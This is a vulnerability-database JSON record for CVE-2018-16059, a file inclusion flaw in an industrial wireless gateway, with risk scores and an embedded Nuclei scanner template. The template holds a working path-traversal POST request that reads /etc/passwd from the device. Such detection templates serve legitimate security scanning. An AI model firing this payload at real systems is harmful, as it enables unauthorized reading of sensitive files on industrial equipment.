{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-16059/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-16059/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-16059/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-16059/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-16059/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-16059"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-16059"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.29816,
      "kev": false,
      "percentile": 0.98121
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-16059.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2018-16059\n\ninfo:\n  name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion\n  author: daffainfo\n  severity: medium\n  description: WirelessHART Fieldgate SWG70 3.0 is vulnerable to local file inclusion via the fcgi-bin/wgsetcgi filename parameter.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system, potentially leading to unauthorized access or information disclosure.\n  remediation: |\n    Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in WirelessHART Fieldgate SWG70 3.0.\n  reference:\n    - https://www.exploit-db.com/exploits/45342\n    - https://ics-cert.us-cert.gov/advisories/ICSA-19-073-03\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-16059\n    - https://www.exploit-db.com/exploits/45342/\n    - https://cert.vde.com/en-us/advisories/vde-2019-002\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n    cvss-score: 5.3\n    cve-id: CVE-2018-16059\n    cwe-id: CWE-22\n    epss-score: 0.29816\n    epss-percentile: 0.98121\n    cpe: cpe:2.3:o:endress:wirelesshart_fieldgate_swg70_firmware:3.00.07:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: endress\n    product: wirelesshart_fieldgate_swg70_firmware\n  tags: cve,cve2018,iot,lfi,edb,endress,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/fcgi-bin/wgsetcgi\"\n\n    body: 'action=ajax&command=4&filename=../../../../../../../../../../etc/passwd&origin=cw.Communication.File.Read&transaction=fileCommand'\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450221009c1502278c56a8aeae131c3c156a4a714ea91c48191e0f6d9dc8286669b5b13d0220236988bcca36e024bcf9ddeb9f780a4663c989dd4a506a20294ea4b9b7d9b957:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-16059"
}